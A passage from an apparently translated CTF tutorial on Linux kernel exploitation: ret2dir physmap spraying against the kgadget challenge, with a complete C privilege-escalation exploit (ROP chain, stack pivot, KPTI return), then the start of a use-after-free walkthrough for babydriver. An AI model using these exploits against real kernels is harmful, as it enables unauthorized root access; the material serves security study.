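  1. vmalloc: allocates in units of pages; the virtual addresses are contiguous, but the physical addresses need not be.
  2. kmalloc: allocates in units of bytes; the memory is contiguous both virtually and physically.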

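kmalloc is what is normally used.
Objects returned by kmalloc live in this direct mapping (physmap), and the physical pages that back user-space memory are mapped there too. So a page we mmap in user space also has a kernel alias at page_offset_base + (its physical address).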

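In early kernels physmap was executable, so we could write shellcode in user space and then hijack kernel control flow into its physmap alias to do whatever we wanted. Nowadays physmap is normally mapped non-executable, so the shellcode route is closed, but we can still get what we want with ROP.
The current technique is therefore: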

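  1. Spray memory from user space with a large number of mmap mappings. The more we map, the larger the share of physical memory holding our data, and the more likely it is that an address we pick in physmap lands on one of our pages.
  2. Use a kernel bug to leak a heap address, i.e. the address of a slab object returned by kmalloc, and derive the physmap address from it.
  3. Use ROP to redirect execution to our data in physmap.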
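The core of ret2dir is a fixed linear relationship: a physical address P is mapped in the kernel at page_offset_base + P. A minimal sketch, assuming the 4-level layout above and no KASLR, so page_offset_base = 0xffff888000000000 (with KASLR this base is randomized); the helper names are hypothetical.

```c
#include <stdint.h>

/* Direct-map base (page_offset_base) from the 4-level table, no KASLR. */
#define PAGE_OFFSET_BASE 0xffff888000000000ULL
#define PAGE_SIZE_4K     0x1000ULL

/* Kernel alias (in physmap) of a physical address. */
static uint64_t phys_to_physmap(uint64_t phys)  { return PAGE_OFFSET_BASE + phys; }

/* Physical address behind a physmap address, e.g. a leaked kmalloc pointer. */
static uint64_t physmap_to_phys(uint64_t vaddr) { return vaddr - PAGE_OFFSET_BASE; }

/* Page-aligned physmap address of the page containing a pointer. */
static uint64_t physmap_page_of(uint64_t vaddr) { return vaddr & ~(PAGE_SIZE_4K - 1); }
```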

This way we sidestep the usual isolation that blocks the kernel from touching user memory: we are effectively operating directly on physical memory.

1. Example: MINI-LCTF 2022 - Kgadget

Here I'll just borrow a challenge written by arttnba3; if this causes any offense I'll take it down right away (I'm timid).

ret2dir challenge

First step: unpack the archive and take a look.

tar -Jxf kgadget.tar.xz

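There are two ways to unpack this xz archive: the command above, or first decompressing it to a .tar and then extracting the tar.
Once we have the file system, let's look at the init script first: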

#!/bin/sh
chown -R 0:0 /
mount -t tmpfs tmpfs /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

chown 0:0 /flag
chmod 400 /flag
chmod 777 /tmp

insmod kgadget.ko
chmod 777 /dev/kgadget

cat /root/banner
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh
poweroff -d 0 -f

2. Reversing in IDA

The init script loads kgadget.ko with insmod; this is our vulnerable module. First, let's check it with checksec.

Then we load it into IDA for static analysis, starting with the ioctl function.

The decompiler output is a bit broken here, so let's read the assembly instead:

.text.unlikely:000000000000011C 48 8B 1A                      mov     rbx, [param]                    ; the function pointer we pass in via param
.text.unlikely:000000000000011F                               kgadget_ptr = rbx                       ; void (*)(void)
.text.unlikely:000000000000011F 48 C7 C7 70 03 00 00          mov     __file, offset unk_370
.text.unlikely:0000000000000126 48 89 DE                      mov     cmd, kgadget_ptr
.text.unlikely:0000000000000129 E8 2A 0F 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000129
.text.unlikely:000000000000012E 48 C7 C7 A0 03 00 00          mov     rdi, offset unk_3A0
.text.unlikely:0000000000000135 E8 1E 0F 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000135
.text.unlikely:000000000000013A 48 89 65 E8                   mov     [rbp-18h], rsp
.text.unlikely:000000000000013E 48 8B 45 E8                   mov     rax, [rbp-18h]
.text.unlikely:0000000000000142 48 C7 C7 F8 03 00 00          mov     rdi, offset byte_3F8
.text.unlikely:0000000000000149 48 05 00 10 00 00             add     rax, 1000h
.text.unlikely:000000000000014F 48 25 00 F0 FF FF             and     rax, 0FFFFFFFFFFFFF000h         ; rax is now the top of the kernel stack (its highest address)
.text.unlikely:0000000000000155 48 8D 90 58 FF FF FF          lea     rdx, [rax-0A8h]                 ; rdx = stack top - 0xA8: the pt_regs frame where registers are saved on kernel entry
.text.unlikely:000000000000015C 48 89 55 E8                   mov     [rbp-18h], rdx
.text.unlikely:0000000000000160                               regs = rdx                              ; pt_regs *
.text.unlikely:0000000000000160 48 BA 61 72 74 74 6E 62 61 33 mov     regs, 3361626E74747261h         ; junk value (the bytes spell "arttnba3")
.text.unlikely:000000000000016A 48 89 90 58 FF FF FF          mov     [rax-0A8h], rdx                 ; r15
.text.unlikely:0000000000000171 48 89 90 60 FF FF FF          mov     [rax-0A0h], rdx                 ; r14
.text.unlikely:0000000000000178 48 89 90 68 FF FF FF          mov     [rax-98h], rdx                  ; r13
.text.unlikely:000000000000017F 48 89 90 70 FF FF FF          mov     [rax-90h], rdx                  ; r12
.text.unlikely:0000000000000186 48 89 90 78 FF FF FF          mov     [rax-88h], rdx                  ; rbp
.text.unlikely:000000000000018D 48 89 50 80                   mov     [rax-80h], rdx                  ; rbx
.text.unlikely:0000000000000191 48 89 50 90                   mov     [rax-70h], rdx                  ; r10
.text.unlikely:0000000000000195 E8 BE 0E 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000195
.text.unlikely:000000000000019A E8 B1 0E 00 00                call    __x86_indirect_thunk_rbx        ; PIC mode

Here we see a pt_regs structure; let's look at what it contains:

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
        unsigned long r15;
        unsigned long r14;
        unsigned long r13;
        unsigned long r12;
        unsigned long rbp;
        unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
        unsigned long r11;
        unsigned long r10;
        unsigned long r9;
        unsigned long r8;
        unsigned long rax;
        unsigned long rcx;
        unsigned long rdx;
        unsigned long rsi;
        unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
        unsigned long orig_rax;
/* Return frame for iretq */
        unsigned long rip;
        unsigned long cs;
        unsigned long eflags;
        unsigned long rsp;
        unsigned long ss;
/* top of stack page */
};

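Since I have written an operating system before, I recognized it at a glance: it is the register frame saved on entry to the kernel (syscall or interrupt), stored at the top of the kernel stack. The ioctl overwrites r15-r12, rbp, rbx and r10 in it with a junk value and leaves only a few key registers intact.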
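To match the IDA listing against the struct, we can compute how far below the stack top each field lives. A sketch that copies the pt_regs layout shown above into user space (uint64_t stands in for unsigned long) and assumes, as the listing's rax - 0xA8 implies, that pt_regs ends exactly at the stack top; the struct and macro names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* User-space copy of the x86-64 struct pt_regs layout shown above. */
struct pt_regs_model {
    uint64_t r15, r14, r13, r12, rbp, rbx;
    uint64_t r11, r10, r9, r8, rax, rcx, rdx, rsi, rdi;
    uint64_t orig_rax;
    uint64_t rip, cs, eflags, rsp, ss;
};

/* Distance of a field below the top of the kernel stack. */
#define BELOW_STACK_TOP(field) \
    (sizeof(struct pt_regs_model) - offsetof(struct pt_regs_model, field))
```

So the writes at -0xA8 through -0x80 hit r15 through rbx, the write at -0x70 hits r10, and r11 at -0x78 is left alone.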
Then the last instruction:

.text.unlikely:0000000000000195
.text.unlikely:000000000000019A E8 B1 0E 00 00                call    __x86_indirect_thunk_rbx        ; PIC mode

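This is a retpoline thunk emitted by the compiler (a Spectre v2 mitigation); it is equivalent to call rbx, and rbx holds the function pointer we just passed in.
Having analyzed ioctl, let's look at qemu's start script: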

#!/bin/sh
qemu-system-x86_64 \
  -m 256M \
  -cpu kvm64,+smep,+smap \
  -smp cores=2,threads=2 \
  -kernel bzImage \
  -initrd ./rootfs.cpio \
  -nographic \
  -monitor /dev/null \
  -snapshot \
  -append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \
  -no-reboot

3. Preparation

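We can see that SMEP and SMAP are enabled, cutting the kernel off from user-space code and data, and that the kernel boots with nokaslr, so we can take the key function addresses straight from vmlinux.
All we have right now is bzImage, so we first extract vmlinux from it and then look up the key function addresses.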

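  • There are two ways to get vmlinux. One is the extract-vmlinux script below, though it sometimes fails to varying degrees: either it cannot actually decompress the image, or the result has no symbol table.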
#!/bin/sh
# SPDX-License-Identifier: GPL-2.0-only
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
#
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <dick@streefland.net>
#
# (c) 2011 Corentin Chary <corentin.chary@gmail.com>
#
# ----------------------------------------------------------------------

check_vmlinux()
{
# Use readelf to check if it's a valid ELF
# TODO: find a better to way to check that it's really vmlinux
# and not just an elf
readelf -h $1 > /dev/null 2>&1 || return 1

cat $1
exit 0
}

try_decompress()
{
# The obscure use of the "tr" filter is to work around older versions of
# "grep" that report the byte offset of the line instead of the pattern.

# Try to find the header ($1) and decompress from here
for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
do
pos=${pos%%:*}
tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
check_vmlinux $tmp
done
}

# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
echo "Usage: $me <kernel-image>" >&2
exit 2
fi

# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0

# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd

# Finally check for uncompressed images or objects:
check_vmlinux $img

# Bail out:
echo "$me: Cannot find vmlinux." >&2

The other is the more complete vmlinux-to-elf, available on GitHub:

vmlinux-to-elf

Now let's get the addresses of the two functions:

ffffffff810c92e0 <commit_creds>:
ffffffff810c9540 <prepare_kernel_cred>:

You should still remember how we escalate privileges: execute commit_creds(prepare_kernel_cred(NULL)), which gives the current process root credentials.

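Recalling the technique above, the user program needs to allocate a large amount of memory to raise the chance of hitting the corresponding physical memory from kernel mode, so in our C program we use mmap to create anonymous mappings: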

map_spray[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
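Expanded into a loop, the spray could look like the sketch below. It assumes the payload is one fixed block repeated across every page (a real exploit would use its own ROP payload here); spray_pages is a hypothetical name. Writing to each page matters: only then does the kernel back it with a physical frame, which then also appears in physmap.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map `count` anonymous pages, fill each with copies of `payload`,
 * store the page addresses in out[] and return how many were mapped. */
static size_t spray_pages(void **out, size_t count,
                          const void *payload, size_t payload_len)
{
    long ps = sysconf(_SC_PAGESIZE);
    if (ps <= 0 || payload_len == 0 || payload_len > (size_t)ps)
        return 0;
    size_t page_size = (size_t)ps;
    size_t n;
    for (n = 0; n < count; n++) {
        void *p = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED)
            break;
        /* touching the page forces a physical frame behind it */
        for (size_t off = 0; off + payload_len <= page_size; off += payload_len)
            memcpy((char *)p + off, payload, payload_len);
        out[n] = p;
    }
    return n;
}
```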

Now we need some gadgets for the exploit.

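As with kernel ROP earlier, we need gadgets such as swapgs and iretq. However, the start script enables KPTI (pti=on), so on the way back to user mode we also have to switch CR3, i.e. go back to the user page table. We can therefore reuse the kernel function shown below, which already contains the swapgs; iretq sequence along with the CR3 switch. Note that its tail can be summarized as follows: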

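mov rdi, rsp;
push [rdi+0x30]; push [rdi+0x28]; push [rdi+0x20]; push [rdi+0x18]; push [rdi+0x10];
push [rdi];
push rax;
(switch CR3 to the user page table)
pop rax;
pop rdi;
swapgs;
iretq;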

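So if we jump into the function at mov rdi, rsp, rip is read from [rdi+0x10], and the ROP chain needs two padding qwords for the [rdi] and [rdi+8] slots :)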
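The tail of such a chain can be written as a small helper. A sketch that assumes the entry point is the mov rdi, rsp instruction from the listing below, i.e. 0xffffffff81c00fb0 + 0x1b = 0xffffffff81c00fcb, which is only valid for this bzImage booted with nokaslr; append_kpti_return is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>

/* Address of swapgs_restore_regs_and_return_to_usermode (from the listing)
 * and the mov rdi, rsp inside it, skipping the pt_regs pops. */
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00fb0ULL
#define KPTI_TRAMPOLINE (SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 0x1b)

/* Appends the return-to-user tail at chain[i]; returns the new length.
 * After ret into the trampoline, rdi = rsp = &chain[i + 1]. */
static size_t append_kpti_return(uint64_t *chain, size_t i, uint64_t rip,
                                 uint64_t cs, uint64_t rflags,
                                 uint64_t rsp, uint64_t ss)
{
    chain[i++] = KPTI_TRAMPOLINE;
    chain[i++] = 0;       /* [rdi]:      pushed, later popped into rdi */
    chain[i++] = 0;       /* [rdi+0x08]: never read */
    chain[i++] = rip;     /* [rdi+0x10] */
    chain[i++] = cs;      /* [rdi+0x18] */
    chain[i++] = rflags;  /* [rdi+0x20] */
    chain[i++] = rsp;     /* [rdi+0x28] */
    chain[i++] = ss;      /* [rdi+0x30] */
    return i;
}
```

This is the same shape as the meowmow exp's tail (its entry address, two 0xdeadbeef paddings, then rip, cs, rflags, rsp, ss), just with this kernel's address.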

The function is swapgs_restore_regs_and_return_to_usermode:

.text:FFFFFFFF81C00FB0                               public swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81C00FB0                               swapgs_restore_regs_and_return_to_usermode proc near
.text:FFFFFFFF81C00FB0                                                                       ; CODE XREF: ret_from_fork+15↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+54↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+65↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+74↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+87↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+94↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+A3↑j
.text:FFFFFFFF81C00FB0                                                                       ; error_return+E↓j
.text:FFFFFFFF81C00FB0                                                                       ; asm_exc_nmi+93↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSENTER_compat_after_hwframe+4F↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_compat_after_hwframe+47↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_INT80_compat+85↓j
.text:FFFFFFFF81C00FB0                                                                       ; DATA XREF: print_graph_irq+D↑o
.text:FFFFFFFF81C00FB0                                                                       ; print_graph_entry+59↑o
.text:FFFFFFFF81C00FB0 90                            nop                                     ; Alternative name is '__irqentry_text_end'
.text:FFFFFFFF81C00FB1 90                            nop
.text:FFFFFFFF81C00FB2 90                            nop
.text:FFFFFFFF81C00FB3 90                            nop
.text:FFFFFFFF81C00FB4 90                            nop
.text:FFFFFFFF81C00FB5 41 5F                         pop     r15
.text:FFFFFFFF81C00FB7 41 5E                         pop     r14
.text:FFFFFFFF81C00FB9 41 5D                         pop     r13
.text:FFFFFFFF81C00FBB 41 5C                         pop     r12
.text:FFFFFFFF81C00FBD 5D                            pop     rbp
.text:FFFFFFFF81C00FBE 5B                            pop     rbx
.text:FFFFFFFF81C00FBF 41 5B                         pop     r11
.text:FFFFFFFF81C00FC1 41 5A                         pop     r10
.text:FFFFFFFF81C00FC3 41 59                         pop     r9
.text:FFFFFFFF81C00FC5 41 58                         pop     r8
.text:FFFFFFFF81C00FC7 58                            pop     rax
.text:FFFFFFFF81C00FC8 59                            pop     rcx
.text:FFFFFFFF81C00FC9 5A                            pop     rdx
.text:FFFFFFFF81C00FCA 5E                            pop     rsi                             ; up to here the code restores the pt_regs registers saved on kernel entry
.text:FFFFFFFF81C00FCB 48 89 E7                      mov     rdi, rsp                        ; we can skip those pops and start executing here
.text:FFFFFFFF81C00FCE 65 48 8B 24 25 04 60 00 00    mov     rsp, gs:qword_6004
.text:FFFFFFFF81C00FD7 FF 77 30                      push    qword ptr [rdi+30h]
.text:FFFFFFFF81C00FDA FF 77 28                      push    qword ptr [rdi+28h]
.text:FFFFFFFF81C00FDD FF 77 20                      push    qword ptr [rdi+20h]
.text:FFFFFFFF81C00FE0 FF 77 18                      push    qword ptr [rdi+18h]
.text:FFFFFFFF81C00FE3 FF 77 10                      push    qword ptr [rdi+10h]
.text:FFFFFFFF81C00FE6 FF 37                         push    qword ptr [rdi]
.text:FFFFFFFF81C00FE8 50                            push    rax
.text:FFFFFFFF81C00FE9 EB 43                         jmp     short loc_FFFFFFFF81C0102E
...........
.text:FFFFFFFF81C0102E                               loc_FFFFFFFF81C0102E:                   ; CODE XREF: swapgs_restore_regs_and_return_to_usermode+39↑j
.text:FFFFFFFF81C0102E 58                            pop     rax                             ; two values are popped here, so the ROP chain needs two padding slots
.text:FFFFFFFF81C0102F 5F                            pop     rdi
.text:FFFFFFFF81C01030 0F 01 F8                      swapgs
.text:FFFFFFFF81C01033 FF 25 47 8D E4 00             jmp     cs:off_FFFFFFFF82A49D80

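As the name suggests, this routine runs at the end of interrupt/syscall handling to return from kernel mode to user mode. It first pops a large number of registers to restore the saved context. We do not need that part, so we start executing at 0xFFFFFFFF81C00FCB. From that point the routine still returns to user mode, which is exactly what we need.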

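There is one more problem. This vmlinux has no mov rdi, rax gadget, so chaining commit_creds(prepare_kernel_cred(NULL)) is awkward. We work around it with a small trick. The running kernel contains a static structure, init_cred, which holds root credentials, so we call commit_creds(&init_cred) instead. Looking it up gives: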

ffffffff810c9640:       f0 ff 05 b9 20 9a 01    lock inc DWORD PTR [rip+0x19a20b9]        # ffffffff82a6b700 <init_cred>

4. Exploitation steps

With the basic gadgets found, how do we get them to run? Here are the key points of this challenge:

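  • The ioctl syscall calls a function pointer that we pass in, but it has to be a kernel address. SMAP/SMEP are enabled, so the kernel cannot directly access or execute user memory.
  • We mmap a large amount of user memory, which gets backed by physical memory, and build the same ROP chain in every page. That physical memory is also mapped in the kernel's direct mapping area (physmap), so we only need to pass one kernel address inside the direct mapping. If we spray enough memory, a randomly chosen physmap address will very likely land on one of the ROP pages we built from user space.
  • Finally, ROP needs the chain to sit on the stack. We cannot put our chain on the kernel stack directly, but a stack pivot lets us move the stack onto the target ROP page and escalate privileges reliably.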

5. Stack pivoting and offset calculation

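After this summary, the last missing piece is the stack pivot. But how do we perform it?
From the earlier analysis we know that after ioctl is called, the handler first overwrites some of the saved registers, and the only ones left usable for us are r8 and r9. I am not entirely sure why. Perhaps the other registers are needed by the rest of the ioctl path, while the remaining ones are not contiguous and cannot form a pivot chain?
In any case, we put our pivot into r8 and r9, using the following instruction: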

pop rsp; ret

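We put the address of this gadget in r9 and our guessed address in r8. This pivots the stack onto the physical memory behind our mmap spray, after which the ROP chain runs.
Here is the address of that gadget: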

0xffffffff811483d0 : pop rsp ; ret

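But how do we get execution to reach this gadget? When we enter kernel mode, the stack switches too, and the kernel stack stores the values our user-mode registers had (pt_regs). So we only need to advance rsp by the distance from the current stack top to the slot holding the saved r9, and the next ret will execute the gadget stored there. We find the exact offset by debugging the kernel.
Next, let's find this offset for kgadget. The preparation is covered in my earlier article (you only need to repack the filesystem and the init script):
Linux Kernel PWN Environment Setup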

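Now we debug the kernel to find the offset:
First we use the ioctl syscall to execute our guessed address. The gadget placed there has the form add rsp, val; ret. Its job is to ret into the saved r9, which holds our pop rsp; ret gadget, and that performs the pivot. We set a breakpoint on the first instruction of the fake page: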

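The address filled in here is actually the correct one already, but let's pretend we don't know it and search for the offset. At this point the kernel stack should hold six copies of the marker value "arttnba3", then one other slot, then the marker again. The challenge author, arttnba3, left this marker in the challenge: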

So we inspect the stack at this moment to see whether it has this layout, and it does!

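This matches our expectation. The saved r9 value sits at 0xffffc900001a7f98 (the debugger annotation next to it confirms this), and the r8 slot right below it does hold our guessed address. The offset is a simple subtraction: 0xffffc900001a7f98 - 0xffffc900001a7ed8 = 0xc0
So the first gadget in our ROP page should be add rsp, 0xc0; ret. Unfortunately, searching vmlinux turns up no such instruction, but we found a substitute:
add rsp, 0xa0; pop rbx; pop r12; pop r13; pop rbp; ret
This gadget also moves the stack pointer by 0xc0 in total (0xa0 + 4 * 8 = 0xc0). After it, our ROP chain runs normally. We lay out each ROP page as follows: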

The chain at the very bottom calls the privilege-escalation functions and then returns to user mode.

6. The final test!

With all the steps above explained, we test the exploit in QEMU:

Almost any address we guess in physmap completes the privilege escalation with high probability.

Here is the exp:

// The inline asm below uses Intel syntax: build with -masm=intel
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <ctype.h>
#include <sys/mman.h>

const size_t init_cred = 0xffffffff82a6b700;
const size_t commit_creds = 0xffffffff810c92e0;
const size_t prepare_kernel_cred = 0xffffffff810c9540;
const size_t swapgs_pop2_retuser = 0xFFFFFFFF81C00FB0 + 0x1B;
const size_t pop_rsp_ret = 0xffffffff811483d0;
const size_t add_rsp = 0xffffffff810737fe;
const size_t pop_rdi_ret = 0xffffffff8108c6f0;
const size_t ret = 0xffffffff810001fc;
long page_size; // size of one page
int dev;
size_t* map_spray[16000];
size_t guess;
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status();
void info_log(char*);
void error_log(char*);
void getShell();
void makeROP(size_t*);

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}
void save_status(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved.");
}

void getShell(){
info_log("Ready to get root........");
if(getuid()){
error_log("Failed to get root!");
}
info_log("Root got!");
system("/bin/sh");
}
void makeROP(size_t* space){
int index = 0;
for(; index < (page_size / 8 - 0x30); index++)
space[index] = add_rsp;
for(; index < (page_size / 8 - 0x10); index++)
space[index] = ret;
space[index++] = pop_rdi_ret;
space[index++] = init_cred;
space[index++] = commit_creds;
space[index++] = swapgs_pop2_retuser;
space[index++] = 0xDeadBeef;
space[index++] = 0xdEADbEAF;
space[index++] = (size_t)getShell;
space[index++] = user_cs;
space[index++] = user_rflags;
space[index++] = user_sp;
space[index++] = user_ss;
}

int main(){
save_status();
dev = open("/dev/kgadget", O_RDWR);
if(dev < 0){
error_log("Cannot open device \"/dev/kgadget\"!");
}
page_size = sysconf(_SC_PAGESIZE);
info_log("Spraying physmap...");

map_spray[0] = mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if(map_spray[0] == MAP_FAILED){
error_log("Mmap Failed!");
}
makeROP(map_spray[0]);
info_log("make done!");
/* copy the same ROP page into every sprayed page; mmap reports failure with MAP_FAILED, not NULL */
for(int i=1; i<15000; i++){
map_spray[i] = mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if(map_spray[i] == MAP_FAILED){
error_log("Mmap Failed!");
}
memcpy(map_spray[i], map_spray[0], page_size);
}
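guess = 0xFFFF888000000000 + 0x7000000; /* guessed physmap address */
info_log("Ready to turn to kernel.....");
/* raw ioctl(dev, 0x1bf52, guess) so that r8/r9 reach the saved pt_regs */
__asm__("mov r15, 0xdeadbeef;"
"mov r14, 0xceadbeef;"
"mov r13, 0xbeadbeef;"
"mov r12, 0xaeadbeef;"
"mov r11, 0xdeadbeef;"
"mov r10, 0x123456;"
"mov rbp, 0x1234567;"
"mov rbx, 0x87654321;"
"mov r9, pop_rsp_ret;"   /* r9: pivot gadget, reached through add_rsp */
"mov r8, guess;"         /* r8: new rsp, loaded by pop rsp */
"mov rax, 0x10;"         /* __NR_ioctl */
"mov rcx, 0x12344565;"
"mov rdx, guess;"        /* ioctl argument: the guessed address */
"mov rsi, 0x1bf52;"      /* ioctl command */
"mov rdi, dev;"          /* device fd */
"syscall;"
);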
return 0;
}

III. Kernel Heap - UAF

Example: CISCN - 2017 - babydriver

A classic among classics, so make the most of it: it teaches a lot about kernel structures.

1. Reversing the challenge

First, check the scripts:

#!/bin/bash
qemu-system-x86_64 -initrd core.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm -monitor /dev/null -m 128M --nographic -smp cores=1,threads=1 -cpu kvm64,+smep \
    -s

  1. Single core, single thread
  2. SMEP enabled (the kernel cannot execute user-space code)
  3. With kvm64 and +smep, KPTI is enabled automatically

And the filesystem's init script:

#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0 -f

A babydriver.ko module is loaded, and that is essentially what we need to reverse.
So, as usual, we run checksec on it:

dawn@dawn-virtual-machine:~/KernelLearning/babydriver$ 
[*] '/home/dawn/KernelLearning/babydriver/extract/lib/modules/4.4.72/babydriver.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

Now we start reversing:

babydriver_init is not worth reading in detail: it just registers a /dev/babydev device. Next, look at fops:

.data:00000000000008C0                               ; ===========================================================================
.data:00000000000008C0
.data:00000000000008C0                               ; Segment type: Pure data
.data:00000000000008C0                               ; Segment permissions: Read/Write
.data:00000000000008C0                               _data segment align_32 public 'DATA' use64
.data:00000000000008C0                               assume cs:_data
.data:00000000000008C0                               ;org 8C0h
.data:00000000000008C0                               public fops
.data:00000000000008C0                               ; file_operations fops
.data:00000000000008C0 C0 09 00 00 00 00 00 00 00 00+fops file_operations <offset __this_module, 0, offset babyread, offset babywrite, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 30 01 00 00+                                        ; DATA XREF: babydriver_init:loc_1AA↑o
.data:00000000000008C0 00 00 00 00 F0 00 00 00 00 00+                 offset babyioctl, 0, 0, offset babyopen, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+                 0>
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+_data ends
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+

This is the device's file_operations, which implements read, write, ioctl, open and so on. Let's start with open:

int __fastcall babyopen(inode *inode, file *filp)
{
  __int64 v2; // rdx

  _fentry__(inode, filp);
  babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
  babydev_struct.device_buf_len = 64LL;
  printk("device open\n", 0x24000C0LL, v2);
  return 0;
}

On open, the driver first calls kmem_cache_alloc_trace to allocate kernel memory for a field of the global variable babydev_struct, then sets its length field to 64. Next, the ioctl function:

// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
size_t v3; // rdx
size_t v4; // rbx
__int64 v5; // rdx

_fentry__(filp, *(_QWORD *)&command);
v4 = v3;
if ( command == 0x10001 )
{
kfree(babydev_struct.device_buf);
babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
babydev_struct.device_buf_len = v4;
printk("alloc done\n", 0x24000C0LL, v5);
return 0LL;
}
else
{
printk(&unk_2EB, v3, v3);
return -22LL;
}
}

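With this function we can reallocate the kernel heap buffer of the global babydev_struct at any size we choose, which makes the allocation in open somewhat redundant.
Now for the key vulnerability, the release function (what close ends up calling):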

int __fastcall babyrelease(inode *inode, file *filp)
{
__int64 v2; // rdx

_fentry__(inode, filp);
kfree(babydev_struct.device_buf);
printk("device release\n", filp, v2);
return 0;
}

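It frees the chunk the global variable points to but never sets the pointer to NULL, leaving a dangling pointer for us to exploit.
The remaining read and write functions are ordinary reads and writes and are not worth showing.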

2. Privilege escalation via tty_struct

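Under /dev there is a pseudo-terminal device, /dev/ptmx. Opening it creates a tty_struct, which, like other devices, carries a pointer to an operations table (tty_operations). So we can use the UAF to hijack this structure and redirect its function pointers into our ROP chain to escalate privileges. The rough plan: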

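  1. Open /dev/babydev twice. Because the driver keeps its buffer in a global variable, both file descriptors now refer to the same heap chunk.
  2. Use ioctl to resize that chunk to the size of tty_struct, so that a later tty_struct allocation can take it.
  3. Close one of the two fds. This frees the chunk held by the global variable, but the other fd still points to the freed chunk.
  4. Open /dev/ptmx, which allocates a chunk to hold a tty_struct and receives the chunk we just freed.
  5. Use the remaining fd to modify the tty_struct so that it points to our fake_operations. The table can be built at any time, even on the stack, as long as it exists before this step.
  6. Calling the corresponding function through fake_operations then gives arbitrary code execution, and from there privilege escalation.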

The crucial detail is the size of tty_struct. The earlier chunk must be resized to it so that, once freed, it is reused for the tty_struct. Spoiler: the size is 0x2e0.

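The tty_struct structure, in include/linux/tty.h, looks roughly like this. The listing appears to come from a newer kernel than the challenge's, but the leading fields up to ops are the same: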

struct tty_struct {
int magic;
struct kref kref;
struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
struct tty_driver *driver;
const struct tty_operations *ops;
int index;

/* Protects ldisc changes: Lock tty not pty */
